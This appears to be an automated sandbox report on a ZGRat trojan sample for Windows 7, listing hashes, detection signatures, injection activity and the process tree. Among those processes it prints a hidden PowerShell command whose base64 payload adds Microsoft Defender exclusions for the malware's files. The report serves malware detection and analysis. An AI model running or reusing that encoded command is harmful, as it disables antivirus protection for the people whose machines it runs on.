Analysis
-
max time kernel
130s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
08-05-2024 14:17
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Trojan.PackedNET.2147.22278.5618.exe
Resource
win7-20231129-en
General
-
Target
SecuriteInfo.com.Trojan.PackedNET.2147.22278.5618.exe
-
Size
632KB
-
MD5
9ffcbf13ec0d927ab745589c64dba569
-
SHA1
74e9aa1a9225f2acc5ee4aa86993970d3d6df5a8
-
SHA256
dfba4d1c63cb8b9e426b04fa2b048bfe4554de13e7ce1c2c5e665cc708a23d09
-
SHA512
cb695ca80b70b6b09af9a43d13363aab86186ca0c44d1f324dfb4bb2d978873cde900efc87b4db0ff2b9d0a321b626a1de97c31a995f5c4e437b16ad3f96ae25
-
SSDEEP
12288:9ziGDwpg7nTwyrc30trN3OERv1Qdee1teN4FhunLNhcZU+sNmtwZ:9jrTNrc3aOgv1OeCeSh0NhQU1NmiZ
Malware Config
Signatures
-
Detect ZGRat V1 1 IoCs
resource yara_rule behavioral1/memory/1720-2-0x000000001B700000-0x000000001B804000-memory.dmp family_zgrat_v1 -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2588 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 3000 TypeId.exe -
Loads dropped DLL 1 IoCs
pid Process 2564 taskeng.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3000 set thread context of 3016 3000 TypeId.exe 35 -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2588 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1720 SecuriteInfo.com.Trojan.PackedNET.2147.22278.5618.exe Token: SeDebugPrivilege 2588 powershell.exe Token: SeDebugPrivilege 3000 TypeId.exe Token: SeDebugPrivilege 3016 RegAsm.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 2900 wrote to memory of 2588 2900 taskeng.exe 31 PID 2900 wrote to memory of 2588 2900 taskeng.exe 31 PID 2900 wrote to memory of 2588 2900 taskeng.exe 31 PID 2564 wrote to memory of 3000 2564 taskeng.exe 34 PID 2564 wrote to memory of 3000 2564 taskeng.exe 34 PID 2564 wrote to memory of 3000 2564 taskeng.exe 34 PID 3000 wrote to memory of 3016 3000 TypeId.exe 35 PID 3000 wrote to memory of 3016 3000 TypeId.exe 35 PID 3000 wrote to memory of 3016 3000 TypeId.exe 35 PID 3000 wrote to memory of 3016 3000 TypeId.exe 35 PID 3000 wrote to memory of 3016 3000 TypeId.exe 35 PID 3000 wrote to memory of 3016 3000 TypeId.exe 35 PID 3000 wrote to memory of 3016 3000 TypeId.exe 35 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.2147.22278.5618.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.2147.22278.5618.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
C:\Windows\system32\taskeng.exetaskeng.exe {7BB82FBB-0E47-401E-87F1-F5A180EA7082} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:S4U:1⤵
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABlAGwAYQB5AFMAaQBnAG4AXABUAHkAcABlAEkAZAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEQAZQBsAGEAeQBTAGkAZwBuAFwAVAB5AHAAZQBJAGQALgBlAHgAZQA=2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {25B859C0-6D7D-4A12-886D-050EB29E8B45} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Users\Admin\AppData\Roaming\DelaySign\TypeId.exeC:\Users\Admin\AppData\Roaming\DelaySign\TypeId.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
632KB
MD59ffcbf13ec0d927ab745589c64dba569
SHA174e9aa1a9225f2acc5ee4aa86993970d3d6df5a8
SHA256dfba4d1c63cb8b9e426b04fa2b048bfe4554de13e7ce1c2c5e665cc708a23d09
SHA512cb695ca80b70b6b09af9a43d13363aab86186ca0c44d1f324dfb4bb2d978873cde900efc87b4db0ff2b9d0a321b626a1de97c31a995f5c4e437b16ad3f96ae25